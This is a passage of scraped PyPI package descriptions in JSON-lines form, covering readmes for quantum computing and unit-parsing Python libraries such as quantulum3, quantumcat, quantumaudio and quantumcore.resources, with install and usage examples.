(e.g. not thepremetric Swedish units of measurement).It\u2019s easy to extend these two files to the units/entities of interest. Here is an example of an entry inentities.json:{\"name\":\"speed\",\"dimensions\":[{\"base\":\"length\",\"power\":1},{\"base\":\"time\",\"power\":-1}],\"URI\":\"https://en.wikipedia.org/wiki/Speed\"}nameandURIare self explanatory.dimensionsis the dimensionality, a list of dictionaries each having abase(the name of another entity) and apower(an integer, can be negative).Here is an example of an entry inunits.json:{\"name\":\"metre per second\",\"surfaces\":[\"metre per second\",\"meter per second\"],\"entity\":\"speed\",\"URI\":\"https://en.wikipedia.org/wiki/Metre_per_second\",\"dimensions\":[{\"base\":\"metre\",\"power\":1},{\"base\":\"second\",\"power\":-1}],\"symbols\":[\"mps\"]}nameandURIare self explanatory.surfacesis a list of strings that refer to that unit. The library takes care of plurals, no need to specify them.entityis the name of an entity inentities.jsondimensionsfollows the same schema as inentities.json, but thebaseis the name of another unit, not of another entity.symbolsis a list of possible symbols and abbreviations for that unit.All fields are case sensitive."} +{"package": "quantulum3", "pacakge-description": "quantulum3Python library for information extraction of quantities, measurements\nand their units from unstructured text. 
It is able to disambiguate between similar\nlooking units based on theirk-nearest neighboursin theirGloVevector representation\nand theirWikipediapage.This is the Python 3 compatible fork ofrecastrodiaz'\nforkofgrhawks'\nforkofthe original by Marco\nLagi.\nThe compatibility with the newest version of sklearn is based on\nthe fork ofsohrabtowfighi.User GuideInstallationpipinstallquantulum3To install dependencies for using or training the disambiguation classifier, usepipinstallquantulum3[classifier]The disambiguation classifier is used when the parser find two or more units that are a match for the text.Usage>>>fromquantulum3importparser>>>quants=parser.parse('I want 2 liters of wine')>>>quants[Quantity(2, 'litre')]TheQuantityclass stores the surface of the original text it was\nextracted from, as well as the (start, end) positions of the match:>>>quants[0].surfaceu'2 liters'>>>quants[0].span(7, 15)Thevalueattribute provides the parsed numeric value and theunit.nameattribute provides the name of the parsed unit:>>>quants[0].value2.0>>>quants[0].unit.name'litre'An inline parser that embeds the parsed quantities in the text is also\navailable (especially useful for debugging):>>>printparser.inline_parse('I want 2 liters of wine')I want 2 liters {Quantity(2, \"litre\")} of wineAs the parser is also able to parse dimensionless numbers,\nthis library can also be used for simple number extraction.>>>printparser.parse('I want two')[Quantity(2, 'dimensionless')]Units and entitiesAll units (e.g.litre) and the entities they are associated to (e.g.volume) are reconciled against WikiPedia:>>>quants[0].unitUnit(name=\"litre\", entity=Entity(\"volume\"), uri=https://en.wikipedia.org/wiki/Litre)>>>quants[0].unit.entityEntity(name=\"volume\", uri=https://en.wikipedia.org/wiki/Volume)This library includes more than 290 units and 75 entities. It also\nparses spelled-out numbers, ranges and uncertainties:>>>parser.parse('I want a gallon of beer')[Quantity(1, 'gallon')]>>>parser.parse('The LHC smashes proton beams at 12.8\u201313.0 TeV')[Quantity(12.8, \"teraelectronvolt\"), Quantity(13, \"teraelectronvolt\")]>>>quant=parser.parse('The LHC smashes proton beams at 12.9\u00b10.1 TeV')>>>quant[0].uncertainty0.1Non-standard units usually don't have a WikiPedia page. 
The parser will\nstill try to guess their underlying entity based on their\ndimensionality:>>>parser.parse('Sound travels at 0.34 km/s')[0].unitUnit(name=\"kilometre per second\", entity=Entity(\"speed\"), uri=None)DisambiguationIf the parser detects an ambiguity, a classifier based on the WikiPedia\npages of the ambiguous units or entities tries to guess the right one:>>>parser.parse('I spent 20 pounds on this!')[Quantity(20, \"pound sterling\")]>>>parser.parse('It weighs no more than 20 pounds')[Quantity(20, \"pound-mass\")]or:>>>text='The average density of the Earth is about 5.5x10-3 kg/cm\u00b3'>>>parser.parse(text)[0].unit.entityEntity(name=\"density\", uri=https://en.wikipedia.org/wiki/Density)>>>text='The amount of O\u2082 is 2.98e-4 kg per liter of atmosphere'>>>parser.parse(text)[0].unit.entityEntity(name=\"concentration\", uri=https://en.wikipedia.org/wiki/Concentration)In addition to that, the classifier is trained on the most similar words to\nall of the units surfaces, according to their distance inGloVevector representation.Spoken versionQuantulum classes include methods to convert them to a speakable unit.>>>parser.parse(\"Gimme 10e9 GW now!\")[0].to_spoken()ten billion gigawatts>>>parser.inline_parse_and_expand(\"Gimme $1e10 now and also 1 TW and 0.5 J!\")Gimme ten billion dollars now and also one terawatt and zero point five joules!ManipulationWhile quantities cannot be manipulated within this library, there are\nmany great options out there:pintnatuquantitiesExtensionTraining the classifierIf you want to train the classifier yourself, you will need the dependencies for the classifier (see installation).Usequantulum3-trainingon the command line, the scriptquantulum3/scripts/train.pyor the methodtrain_classifierinquantulum3.classifierto train the classifier.quantulum3-training--lang--data--outputYou can pass multiple training files in to the training command. The output is in joblib format.To use your custom model, pass the path to the trained model file to the\nparser:parser = Parser.parse(, classifier_path=\"path/to/model.joblib\")Example training files can be found inquantulum3/_lang//train.If you want to create a new or differentsimilars.json, installpymagnitude.For the extraction of nearest neighbours from a vector word representation file,\nusescripts/extract_vere.py. It automatically extracts theknearest neighbours\nin vector space of the vector representation for each of the possible surfaces\nof the ambiguous units. The resulting neighbours are stored inquantulum3/similars.jsonand automatically included for training.The file provided should be in.magnitudeformat as other formats are first\nconverted to a.magnitudefile on-the-run. Check outpre-formatted Magnitude formatted word-embeddingsandMagnitudefor more information.Additional unitsIt is possible to add additional entities and units to be parsed by quantulum. These will be added to the default units and entities. See below code for an example invocation:>>>fromquantulum3.loadimportadd_custom_unit,remove_custom_unit>>>add_custom_unit(name=\"schlurp\",surfaces=[\"slp\"],entity=\"dimensionless\")>>>parser.parse(\"This extremely sharp tool is precise up to 0.5 slp\")[Quantity(0.5, \"Unit(name=\"schlurp\", entity=Entity(\"dimensionless\"), uri=None)\")]The keyword arguments to the functionadd_custom_unitare directly translated\nto the properties of the unit to be created.Custom Units and EntitiesIt is possible to load a completely custom set of units and entities. 
This can be done by passing a list of file paths to the load_custom_units and load_custom_entities functions. Loading custom untis and entities will replace the default units and entities that are normally loaded.The recomended way to load quantities is via a context manager:>>>fromquantulum3importload,parser>>>withload.CustomQuantities([\"path/to/units.json\"],[\"path/to/entities.json\"]):>>>parser.parse(\"This extremely sharp tool is precise up to 0.5 slp\")[Quantity(0.5, \"Unit(name=\"schlurp\", entity=Entity(\"dimensionless\"), uri=None)\")]>>># default units and entities are loaded againBut it is also possible to load custom units and entities manually:>>>fromquantulum3importload,parser>>>load.load_custom_units([\"path/to/units.json\"])>>>load.load_custom_entities([\"path/to/entities.json\"])>>>parser.parse(\"This extremely sharp tool is precise up to 0.5 slp\")[Quantity(0.5, \"Unit(name=\"schlurp\", entity=Entity(\"dimensionless\"), uri=None)\")]>>># remove custom units and entities and load default units and entities>>>load.reset_quantities()See the Developer Guide below for more information about the format of units and entities files.Developer GuideAdding Units and EntitiesSeeunits.jsonfor the complete list of units andentities.jsonfor\nthe complete list of entities. The criteria for adding units have been:the unit has (or is redirected to) a WikiPedia pagethe unit is in common use (e.g. not thepremetric Swedish units of\nmeasurement).It's easy to extend these two files to the units/entities of interest.\nHere is an example of an entry inentities.json:\"speed\":{\"dimensions\":[{\"base\":\"length\",\"power\":1},{\"base\":\"time\",\"power\":-1}],\"URI\":\"https://en.wikipedia.org/wiki/Speed\"}Thenameof an entity is its key. Names are required to be unique.URIis the name of the wikipedia page of the entity. (i.e.https://en.wikipedia.org/wiki/Speed=>Speed)dimensionsis the dimensionality, a list of dictionaries each\nhaving abase(the name of another entity) and apower(an\ninteger, can be negative).Here is an example of an entry inunits.json:\"metre per second\":{\"surfaces\":[\"metre per second\",\"meter per second\"],\"entity\":\"speed\",\"URI\":\"Metre_per_second\",\"dimensions\":[{\"base\":\"metre\",\"power\":1},{\"base\":\"second\",\"power\":-1}],\"symbols\":[\"mps\"]},\"year\":{\"surfaces\":[\"year\",\"annum\"],\"entity\":\"time\",\"URI\":\"Year\",\"dimensions\":[],\"symbols\":[\"a\",\"y\",\"yr\"],\"prefixes\":[\"k\",\"M\",\"G\",\"T\",\"P\",\"E\"]}Thenameof a unit is its key. Names are required to be unique.URIfollows the same scheme as in theentities.jsonsurfacesis a list of strings that refer to that unit. The library\ntakes care of plurals, no need to specify them.entityis the name of an entity inentities.jsondimensionsfollows the same schema as inentities.json, but thebaseis the name of another unit, not of another entity.symbolsis a list of possible symbols and abbreviations for that\nunit.prefixesis an optional list. It can containMetricandBinary prefixesand\nautomatically generates according units. 
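One practical wrinkle with the manual loaders just shown is remembering to restore the defaults afterwards; a short sketch using try/finally is given below. The file paths are placeholders, and the custom files are assumed to follow the same schema as the default units.json and entities.json described in the Developer Guide that follows. For most cases the CustomQuantities context manager above remains the simpler choice.

```python
# Sketch only: placeholder paths; the custom files are assumed to use the same
# schema as the default units.json / entities.json documented below.
from quantulum3 import load, parser

load.load_custom_units(["path/to/units.json"])
load.load_custom_entities(["path/to/entities.json"])
try:
    print(parser.parse("This extremely sharp tool is precise up to 0.5 slp"))
finally:
    # Restore the default units and entities even if parsing fails.
    load.reset_quantities()
```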
If you want to\nadd specifics (like different surfaces) you need to create an entry for that\nprefixes version on its own.All fields are case sensitive.Contributingdevbuild:If you'd like to contribute follow these steps:Clone a fork of this project into your workspaceRunpip install -e .at the root of your development folder.pip install pipenvandpipenv shellInside the project folder runpipenv install --devMake your changesRunscripts/format.shandscripts/build.pyfrom the package root directory.Test your changes withpython3 setup.py test(Optional, will be done automatically after pushing)Create a Pull Request when having commited and pushed your changesLanguage supportThere is a branch for language support, namelylanguage_support.\nFrom inspecting theREADMEfile in the_langsubdirectory and\nthe functions and values given in the new_lang.en_USsubmodule,\none should be able to create own language submodules.\nThe new language modules should automatically be invoked and be available,\nboth through thelang=keyword argument in the parser functions as well\nas in the automatic unittests.No changes outside the own language submodule folder (i.e._lang.de_DE) should\nbe necessary. If there are problems implementing a new language, don't hesitate to open an issue."} +{"package": "quantum", "pacakge-description": "Quantum (virtual network service)"} +{"package": "quantum6g", "pacakge-description": "Quantum6G: Auto AI Advanced Quantum Neural Networks with 6G TechnologyQuantum6G is an automatic artificial intelligence library that combines quantum computing and 6G technologies to build advanced quantum neural networks. It provides a high-level interface for constructing, training, and evaluating quantum neural networks. This library was developed byQuantum PIYA.InstallationTo install the Quantum6G library, simply run the following command:pip install quantum6gGetting StartedHere is a simple example to get started with the Quantum6G library:from quantum6g import Quantum6GCreate a quantum neural networkquantum_6g = Quantum6G(output_unit=1, num_layers=4, epochs=2, loss='mse', input=4, batch_size=256, learning_rate=0.2)Build the modelquantum_6g = quantum_6g.build_model(X_train, y_train, X_test, y_test)Evaluate the modelprint(\"Accuracy: {:.2f}%\".format(quantum_6g[1][1] * 100))\nprint(\"Loss: {:.2f}%\".format(quantum_6g[1][0] * 100))Build and Fit Quantum6G_KNN --- from v1.2.5Vquantum_knn = Quantum6G_KNN(n_qubits=4, n_neighbors=6)\nquantum_knn.fit(X_train, y_train)Evaluate the Quantum6G_KNN modelquantum_pred = quantum_knn.predict(X_test,y_test)\nquantum_accuracy = accuracy_score(y_test, quantum_pred)\nprint(f\"Accuracy of Quantum6G_KNN: {quantum_accuracy:.3f}\")Build Quantum Model for QCNN (Quantum Convolutional Neural Network) --- from v1.3.0Vq_cnn = QCNN(\n input_shape=(2, 2, 1),\n output_neurons=10,\n loss_function=\"sparse_categorical_crossentropy\",\n epochs=5,\n batch_size=32,\n optimizer=\"adam\",\n n_layers=1,\n n_wires=4,\n)\nq_cnn_model = q_cnn.build_model()Evaluate the QCNN modelq_cnn.benchmark(q_cnn_model, x_train_resized[..., np.newaxis], y_train, x_test_resized[..., np.newaxis], y_test)DonateYou can donate for this project!ETH - ERC20: 0xa6F7170Ca63cf284A8ba6339b565445468E04Ff2BTC - Bech32: bc1qfek2lun4tc7d7zftz0v4auxc9dzn77h9xq9x26v02u6s3rgl7hesxt4r2hUSDT - TRC20: TWVcF24DjPnGfhegmJjBQw2iE4vxQBuYTYDocumentationFor more information on how to use the Quantum6G library, please refer to the documentation available at [the soon].ContributingWe welcome contributions to the Quantum6G library. 
If you would like to contribute, please fork the repository and make your changes, then submit a pull request.LicenseThe Quantum6G library is open source and released under the MIT license. For more information, please see theLICENSEfile."} +{"package": "quantum-android", "pacakge-description": "No description available on PyPI."} +{"package": "quantumania", "pacakge-description": "A command line app for taking beautiful quantum notes.qlmgives you access to beautiful quantum notes on any machine.The name comes from the Arabic word for pen:\u0642\u0644\u0645which makes use of the three letter rootq-l-mto cut, snip, prune, clip or truncate. So\ntry to keep those notes concise ;-)Basic Usagepip install quantumania\nqlm connect 'username/repo'\necho '# My notes' > my_note.md\nqlm add my_note.md\nqlm show my_note.md$u42{8haO69Y7DRocF69dniotOAWEI06opV0D}"} +{"package": "quantum-assembler", "pacakge-description": "No description available on PyPI."} +{"package": "quantumatrix", "pacakge-description": "soon"} +{"package": "quantumaudio", "pacakge-description": "quantumaudioQuantumaudio Module: A Python package for Quantum Representations of Audio in qubit systems & examplesquantumaudiois a Python module with class implementations for building quantum circuits that encode and decode audio signals as quantum states. This is primarily aimed for quantum computing simulators, but itmightalso run on real quantum hardware. The main objective is to have a readily available tools for using quantum representations of audio in artistic contexts and for studying future Quantum Signal Processing algorithms for audio.This package contains class implementations for generating quantum circuits from audio signals, as well as necessary pre and post processing functions.It contatins implementations for three representation algorithms cited on the publication above, namely:QPAM - Quantum Probability Amplitude Modulation (Simple quantum superposition or \"Amplitude Encoding\")SQPAM - Single-Qubit Probability Amplitude Modulation (similar toFRQIquantum image representations)QSM - Quantum State Modulation (also known asFRQAin the literature)For an introduction to quantum audio please refer to the book chapterQuantum Representations of Sound: From Mechanical Waves to Quantum Circuitsby Paulo V. Itabora\u00ed and Eduardo R. Miranda (draft versionavailable at ArXiV). The chapter also discusses QPAM, SQPAM and QSM, and glances over methods to implement quantum audio signal processing.Additional documentaion is availableherealong with a Jupyter Notebooktutorialshowing how the main methods work and general implementation workflow with the package. Additionally, to listen the results, there is a set ofexamplesfor interfacing the quantum circuits withSuperCollider, a powerful synthesis engine for live musical applications.DependenciesThequantumaudiopackage alone has the following dependencies:qiskit (the quantum programming framework)numpymatplotlibbitstring (for decoding purposes)ipython (for listening purposes inside jupyter notebooks)For running thesupercollider examples, additional packages are needed:SuperCollider scsynth (install SuperCollider)Cythonpyliblopython-supercollider client(pip install supercollider)InstallationThis python module is distributed as a package in PyPi. 
It can be installed in any operating system by usingpipin a console or terminal:Windowspip install quantumaudioMac & Linuxpip3 install quantumaudioOptionally, you can download the latestrelease, which also contains the examples and tutorial notebooks.It is possible to install the additional python dependencies for running the supercollider examples automatically, by running the installation command with the[examples]optional dependencies:Windowspip install quantumaudio[examples]Mac & Linuxpip3 install quantumaudio[examples]Jupyter Notebook ExamplesIdeally, you wouldpip installthe package in your own python environment and then download the latest example/tutorial files from thereleasespage.NOTEThere is a known bug when installingpyliblopackages throughpip install quantumaudio[examples]in some systems. A temporary workaround is shownhere.UsageTo learn how to use this module, refer to thetutorialnotebook.Both the tutorial and supercollider examples were written asJupyter Notebooksthat can be read inside this repo, or run in your local Jupyter Notebook server.Feedback and Getting helpPlease open anew issue, to help improve the code. They are most welcome.You may gain insight by learning more aboutQiskitandSuperCollider. We also strongly reccomend the reading of theQuantum Representations of Soundbook chapter for a better understanding of quantum representations of audio.API ReferenceMost methods and functions in the module contain docstrings for better understanding the implementation. This API documentation is available and readablehere.ContributingClone/Fork this repo and help contributing to the code! Pull Requests are very welcome. You can also contact themain authorto exchange ideas (highly reccomended). Make sure to install the[dev]and[doc]optional dependencies for running necessarypytests.AcknowledgementsThis repo was created by the quantum computer music team at theInterdisciplinary Centre for Computer Music Research (ICCMR), University of Plymouth, UK.Paulo Itabora\u00edis the lead developer.See also theQuTune Projectrepository for other resources developed by the ICCMR group.quantumaudiohas anMIT license. If you use this code in your research or art, please cite it according to thecitation file.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "quantum-automated-system-for-advanced-recycling", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-blackbird", "pacakge-description": "Blackbird is a quantum assembly language for continuous-variable quantum computation, that can be used to program Xanadu\u2019s quantum photonics hardware and Strawberry Fields simulator.FeaturesThe Blackbird repository contains threeseparatepackages:src: The Blackbird grammar specification in enhanced Brackus-Naur formblackbird_python: to develop Blackbird parsers for integration with Python programsblackbird_cpp: libraries and header files needed to develop Blackbird\nparsers for integration with C++ programsAll of these packages are independent, and can be installed separately without\ndepending on one-another.However, if the grammar is ever modified, there\nis a command for updating the autogenerated parts of the Python and C++\nparsers.In addition, this repository contains:example: Example Blackbird scriptsapps: Example Python/C++ applications using the above parsersGetting startedBlackbird is a development library, designed to easily integrate Blackbird code\ninto applications and interfaces.To get the Blackbird grammar installed and running on your system, begin at thegrammar installation guide. Then, familiarize yourself with the Blackbird\u2019ssyntax and grammarfor specifying photonic quantum circuits. You can even generate Blackbird parsers for any target language supported\nby ANTLR, including Java, C#, JavaScript, Go, and Swift.If you only want to develop an application that makes use of thePython parseror theC++ parser, you can go directly to those sections and their corresponding installation guides.How to citeIf you are doing research using Blackbird, please citeNathan Killoran, Josh Izaac, Nicol\u00e1s Quesada, Ville Bergholm, Matthew Amy, and Christian Weedbrook.Strawberry Fields: A Software Platform for Photonic Quantum Computing2018.arXiv:1804.03159SupportSource Code:https://github.com/XanaduAI/BlackbirdIssue Tracker:https://github.com/XanaduAI/Blackbird/issuesIf you are having issues, please let us know by posting the issue on our Github issue tracker.LicenseBlackbird isfreeandopen source, released under the Apache License, Version 2.0."} +{"package": "quantumcarrot", "pacakge-description": "#######\nimport quatumcarrot\nquatumcarrot.curse()\n#######"} +{"package": "quantumcat", "pacakge-description": "Introductionquantumcat is a platform-independent, open-source, high-level quantum computing library, which allows the quantum community to focus on developing platform-independent quantum applications without much effort.It is based on two principles:Write once and execute on any supported quantum provider using one syntaxquantumcat should enable researchers and developers to create quantum applications using high-level programming in the future so that they can focus on developing quantum applications instead of learning low-level concepts such as gates and circuitsWrite oncefromquantumcat.utilsimportprovidersnum_of_qubits=2qc=QCircuit(num_of_qubits)qc.h_gate(0)qc.cx_gate(0,1)# To execute on Google Cirqresult=qc.execute(provider=providers.GOOGLE_PROVIDER,repetitions=1024)# To execute on IBM 
Qiskit\nresult = qc.execute(provider=providers.IBM_PROVIDER, repetitions=1024)\n# To execute on Amazon Braket\nresult = qc.execute(provider=providers.AMAZON_PROVIDER, repetitions=1024)\nCompare the results of all the supported providers with a single line of code\n# Execute on all providers in one go\ncircuit.compare_results(plot=True)\nExecute on real IBM quantum hardware with quantumcat\nfrom quantumcat.utils import providers\nresult = qc.execute(provider=providers.IBM_PROVIDER, api='API KEY from IBM Quantum dashboard', device='IBM DEVICE NAME such as ibmq_manila or ibmq_quito')\n# Copy API and Device name from https://quantum-computing.ibm.com/\nInstallation\npip install quantumcat\nPlatforms Supported\nGoogle Cirq\nIBM Qiskit\nAmazon Braket\nIonQ (Via Braket)\nRigetti (Via Braket)\nGates Supported\nClick here to view gates supported\nExamples\nCircuit Creation\nfrom quantumcat.circuit import QCircuit\nnum_of_qubits = 3\nqc = QCircuit(num_of_qubits)\nSingle-Qubit Gate\nqc.x_gate(0)  # applies X gate on qubit 0\nTwo-Qubit Gate\nqc.cx_gate(0, 1)  # control qubit, target qubit\nMulti-Qubit Gate\nqc.mct_gate([0, 1], 2)  # control qubits array, target qubit\nDraw Circuit\nfrom quantumcat.utils import providers\nqc.draw_circuit(provider=providers.GOOGLE_PROVIDER)\nHigh-Level Functions\nSuperposition\nqc.superposition(0)  # puts qubit 0 in superposition\nEntanglement\nqc.entangle(0, 1)  # entangles qubit 0 with qubit 1\nPhase Kickback\nqc.phase_kickback(0)  # applies |-> to qubit 0\nHigh-Level Applications\nRandom Number Generator\nfrom quantumcat.utils import providers, constants\nfrom quantumcat.applications.generator import RandomNumber\nrandom_number = RandomNumber(length=2, output_type=constants.DECIMAL).execute(provider=providers.GOOGLE_PROVIDER)\nprint(random_number)\n# To generate random number on actual IBM device\nrandom_number = RandomNumber(length=2, output_type=constants.DECIMAL).execute(provider=providers.IBM_PROVIDER, repetitions=1024, api='API KEY from IBM Quantum dashboard', device='IBM DEVICE NAME such as ibmq_manila or ibmq_quito')\nprint(random_number)\nPassword Generator\nfrom quantumcat.applications.generator import Password\npassword = Password(8).generate()\nprint(password)\n# Length should be between 5 - 20\n# Password is generated in hexadecimal format using QRNG@ANU JSON API\nOTP Generator\nfrom quantumcat.applications.generator import OTP\notp = OTP().generate()\nprint(otp)\n# 5 digits OTP is generated using QRNG@ANU JSON API\nVisualization\nHistogram\ncircuit = QCircuit(1)\ncircuit.superposition(0)\ncounts = circuit.execute(provider=providers.GOOGLE_PROVIDER, repetitions=1024)\ncircuit.histogram(counts)\nBloch Multivector\ncircuit = QCircuit(1)\ncircuit.superposition(0)\nstate = circuit.execute(provider=providers.GOOGLE_PROVIDER, simulator_name=constants.STATEVECTOR_SIMULATOR)\ncircuit.bloch_multivector(state)\nQSphere\ncircuit = QCircuit(1)\ncircuit.superposition(0)\nstate = circuit.execute(provider=providers.GOOGLE_PROVIDER, simulator_name=constants.STATEVECTOR_SIMULATOR)\ncircuit.state_qsphere(state)\nLicense\nApache License 2.0"}
{"package": "quantum-circuit-slicer", "pacakge-description": "Quantum Circuit Slicer (QCS)\nThis repo contains files to add a quantum circuit slicer to Qiskit. 
The slicer provides some useful functions for debugging quantum circuits.The circuit slicer includes:The addition of the \"breakbarrier\" object, which acts as a breakpoint for quantum circuits.Vslicer function to divide the circuit vertically.Hslicer to remove unused qubits in a particular slice.Gate tracking when you enter debugging mode by calling the startDebug function.Perform queries on a specific gate within a circuit.InstructionsInstallationTo use the circuit slicer, you need to have a working version of Qiskit (version 0.19.6 or higher)pip install quantum-circuit-slicerTestOnce the package is installed, try running the file test.py to make sure eveything is installed and working properly, and how to use the slicer."} +{"package": "quantum-cli", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-cocoa", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-computer", "pacakge-description": "No description available on PyPI."} +{"package": "quantumcomputingsim", "pacakge-description": "Quantum Computing SimulatorA python library to simulate quantum programs and circuits.Table of ContentsTable of ContentsGetting StartedPrerequisitesInstallingUsageAuthorsGetting StartedThese instructions will get you a copy of the project up and running on your local machine for development and testing purposes. Seedeploymentfor notes on how to deploy the project on a live system.PrerequisitesThis library is self contained, and optionally uses matplotlib for plotting graphs.InstallingThis library can be installed from pypi using pip:$ pip install quantumcomputingsimTo make sure everything installed properly, import the main and only module in python:from quantum import *UsageGo through example.ipynb for a comprehensive guide on using this librarySample workflow:entangler = qprogram(\n nqbits = 2,\n name = \"Entangler\"\n)\nentangler.addgates(0, [HGATE, CNOT0])\nentangler.compile()Compiler result:Compiling Entangler...\n\nEntangler\nq0(0) \u2b95 -----[ h ]--\u2308 c0 c0 \u2309-------\nq1(0) \u2b95 ------------\u230a c0 c0 \u230b-------\n\n\nCompilation of Entangler complete!and to run the program:entangler.run(graph = True)and view bloch spheres for qubits:plotbloch(HGATE * [0, 1])Authors@stealthypanda- Idea & Initial work"} +{"package": "quantumcore.contenttypes", "pacakge-description": "IntroductionChangelog0.1.1 (2011-02-27)fixed initial release with proper MANIFEST"} +{"package": "quantumcore.exceptions", "pacakge-description": "Introduction============Change history**************Changelog=========0.1 - Unreleased----------------* Initial releaseDownload********"} +{"package": "quantumcore.resources", "pacakge-description": "Here is an example on how to use it with CSS resources.First we setup some resources:from quantumcore.resources import CSSResourceManager, css_from_pkg_stream\nfrom quantumcore.resources import JSResourceManager, js_from_pkg_stream, jst_from_pkg_stream\n\nr1 = css_from_pkg_stream(__name__,\n 'static/css/screen.css',\n merge=True,\n auto_reload=True)\nr2 = css_from_pkg_stream(__name__,\n 'static/css/addons.css',\n merge=True,\n auto_reload=True)\nr3 = css_from_pkg_stream(__name__,\n 'static/css/print.css',\n merge=True,\n name=\"print\",\n auto_reload=True)\ncss_manager = CSSResourceManager([r1,r2,r3],\n prefix_url=\"/css\",\n auto_reload=True)\n\n# JS\njs_manager = JSResourceManager([\n js_from_pkg_stream(__name__,\n 'static/js/jquery.json-2.2.min.js',\n merge=True, prio=2),\n js_from_pkg_stream(__name__,\n 
'static/js/jquery.cookie.js',\n merge=True,\n minimize_method=\"jsmin\",\n prio=3),\n ], prefix_url=\"/js\", auto_reload=True)This defines two CSS and two JS resources.Instantiating resourcesA resource corresponds to one file on the filesystem. Here we use a shortcut calledjs_from_pkg_streamandcss_from_pkg_streamto load a file from a package.Mandatory common parameters for those functions are:The__name__is being used for identifying the filename inside a package.The path is the path inside the package the__name__belongs to.Optional arguments are:mergedefines if the resource is allowed to be merged with other similar resources. Default isTrue.Withprioyou can define the order of the resources inside a resource manager. Resources with lower numbers are loaded first. Default is1.nameis an optional name under which resources can be clustered together. Resources with the same name can be retrieved together then. It defaults to\"\". In the example the first two CSS resources will be retrieved together because they both have the same empty name.processorsdefine an optional list of processor functions which take the resource contents as input and output another (e.g. compressed) version.auto_reloaddefines whether the resource can be reloaded or not. Note that this must be set in the Resource and the Resource Manager.CSS specific parametersmediafdefines the media type to be used for this stylesheet, e.g.printorscreen. It can be a string or a list of strings. Default is['screen', 'projection'].JS specific parametersminimize_methodis either\"jsmin\"orNoneand if the first is given then the JavaScript code will also be minified, meaning the removal of whitespaces and shortening of variables.Instantiating the Resource ClassesIn case you have a string you can also directly instantiating theCSSResourceorJSResourceclass:r = CSSResource(\n source = u'my CSS',\n minimize_method = None,\n media = ['projection', 'screen'],\n type_ = u'text/css',\n ...\n)\n\nr = JSResource(\n source = u'my JS',\n minimize_method = None,\n type_ = u'text/css',\n ...\n)Except__name__andfilenameall the above mentioned parameters apply.Resource ManagersIn the example above we have seen resource managers like this:css_manager = CSSResourceManager([r1,r2,r3],\n prefix_url=\"/css\",\n auto_reload=True)\n\njs_manager = JSResourceManager([.....],\n prefix_url=\"/js\",\n auto_reload=True)They handle all the CSS and JS files used in a project eventually grouped into clusters.Both versions take aprefix_urlunder which they are served later on. This defines which URLs will be computed by the manager instance.Optional parameters are:no_mergecan beTrueorFalseand defines whether the resources are merged into clusters or not.auto_reloaddefines whether the manager should test if resources have been changed and should be reloaded. This only works if the resources haveauto_reloadset toTrueas well.We can also add resources later:css_manager.append(resource3)\njs_manager.append(resource4)Now we can pass this resource object to a template, e.g. to a Chameleon template:template.render(js_manager = js_manager, css_manager = css_manager)The template code then looks like this:\nThis will render links to all the unnamed clusters (means resources with nonameparameter\ngiven). You can also render links to all resources with a certain name like this:will render all resources withname='ie'.In the resulting HTML this will look similar to this:\n\n\nAs you can see the resources are clustered together into files if possible. 
Moreover a cache key is given to each resource link which will change if the contents change.Serving resourcesTo serve those files we have to pass the URL to the resource registry. Inside a WSGI app this might look like this:def __call__(self, environ, start_response):\n path = environ['PATH_INFO'].split(\"/\")\n\n if path[1]==\"css\":\n css_manager.render_wsgi(environ, start_response)\n elif path[1]==\"js\":\n js_manager.render_wsgi(environ, start_response)This will take the path inside the WSGI environment and check if it matches one of the generated URLs.Without WSGI it might look like this:code, data, headers = resources.render(url)datais an iterator with the merged and minimized CSS file,codeis the return code, usually200 Ok.headersis a list of(key, value)tuples.Change history0.6 - (unreleased)fixed naming bug: if resources have different names and different prios they only have been sorted\nby priority. This led to merge errors as the name kept changing while trying to merge.\nNow they are sorted by name first and priority then.0.5 - (2010/04/06)initial releaseDownload"} +{"package": "quantumcore.storages", "pacakge-description": "quantumcore.storagesis a collection of different storage mechanisms for various kinds\nof data such as binary objects (files, images etc.), dictionary like documents and more.It will support backends like GridFS, S3, MongoDB and others.Change history0.009 - (2011/02/23)FileSystemStorage: added a copy() method. It takes a source filename and an\noptional destination filename and copies a file0.008 - (2011/02/22)FileSystemStorage: sizeof() now returns bytes instead of KBFileSystemStorage: implemented get() as alias for __getitem__()0.007 - (????)initial releaseDownload"} +{"package": "quantumcrypt", "pacakge-description": "hehe"} +{"package": "quantum-cryptography", "pacakge-description": "soon"} +{"package": "quantum-curses", "pacakge-description": "No description available on PyPI."} +{"package": "quantumdata-sdk", "pacakge-description": "Quantumdata sdkauth tokenwrite to me on rafalniewinski95@gmail.com \nif you want get access to our databasesimple usage:get companies:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_companies()\n\n\nget quotations:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_quotations(\"KGHM\")\n\n\nget reports:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_reports(\"KGHM\")"} +{"package": "quantum-dataset", "pacakge-description": "Quantum DatasetA collection of measurements on quantum devices.The data for the QuantumDataset is attached to the github release namedTest, seehttps://github.com/QuTech-Delft/quantum_dataset/releases/tag/TestExample usagefrom quantumdataset import QuantumDataset\nquantum_dataset=QuantumDataset(data_directory=None)\nquantum_dataset.list_tags()\n\ndataset = quantum_dataset.load_dataset('allxy', 0)\nquantum_dataset.plot_dataset(dataset)\n\nquantum_dataset.generate_overview_page(quantum_dataset.data_directory / 'overview')"} +{"package": "quantum-decomp", "pacakge-description": "Tool for decomposing unitary matrix into quantum gatesThis is a Python tool which takes a unitary matrix and returns\na quantum circuit implementing it as Q# code, Cirq circuit, or Qiskit circuit.Installingpip install 
